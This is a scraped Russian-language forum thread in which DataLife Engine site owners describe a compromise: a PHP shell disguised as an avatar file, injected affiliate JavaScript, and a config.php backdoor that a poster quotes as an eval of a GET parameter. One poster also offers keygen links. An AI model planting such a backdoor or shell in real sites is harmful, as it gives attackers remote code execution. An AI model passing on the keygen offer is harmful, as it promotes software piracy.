BKK
Профессор
- Реакции
- 46
Эта программа называется ДДОСИМ КЛИЕНТОВ ***но ХОСТИНГАЭто пи**ец какойто, девка с помощью програмки ложит сайты (хз может best-hoster или версия дле9 виновны) в итоге на странице
Follow along with the video below to see how to install our site as a web app on your home screen.
Примечание: This feature may not be available in some browsers.
Эта программа называется ДДОСИМ КЛИЕНТОВ ***но ХОСТИНГАЭто пи**ец какойто, девка с помощью програмки ложит сайты (хз может best-hoster или версия дле9 виновны) в итоге на странице
А как тебе умудрились залить файл с разрешением glf в фотографии? в DLE же стоят фильтры котоыре пропускают только определённые файлы.я в папке upload/fotos, где аваты юзеров нашел файл foto_33333.glf подозрительно малого размера, глянул в текстовом редакторе его код а там пхп код:
А как
этоже папка под аватар - туда можно по умолчанию гифы лить.А как тебе умудрились залить файл с разрешением glf в фотографии? в DLE же стоят фильтры котоыре пропускают только определённые файлы.
ставьте лицуху а кейген есть в сети, зачем вам нуллы с шелами ? зачем себе мозги засорять всякой ерундой по поводу "нулл с шелами наверное?"
видел много таких комментов с релизами дле на различных сайтах
если кому нужна ссыль на кейген то пишите в ЛС. а так я думаю гуглом многие умеют пользоваться
У меня такая же самая беда.
Вот что ещё надо проверить:
файл dbconfig.php и config.php в папке /engine/data/
В файл dbconfig.php прописывается жаваскрипт с партнёркой. А в файл config.php дописывается код:
Скорей всего что используется недавно обнаруженная уязвимость на недостаточную обработку данных. Об этом можно прочитать и на офф. сайте DLE и здесь у нас на форуме тоже Для просмотра ссылки ВойдиКод:'lang_123' => "{${@eval($_GET[cmd])}}",
или Зарегистрируйся.
Очень удобно, имея на руках базу DLEшных сайтов для постинга новостей, пройтись по ней с целью использования уязвимости. Есть кстати версия, что это разработчики DLE решили использовать уязвимость для поднятия уровня продаж своего софта.
этоже папка под аватар - туда можно по умолчанию гифы лить.
Вот кстати если вносят изменения в /engine/data/dbconfig.php и /engine/data/config.php имеет ли смысл после того как настроите сайт по FTP поставить chmod 555? Как думаете? В эти же файлы пишут всякие гадости + в config.php прописываются - 'files_type' => "zip,rar,exe,doc,pdf,swf", и если через админку добавить разрешение на .php то можно со спокойной душей грузить шеллы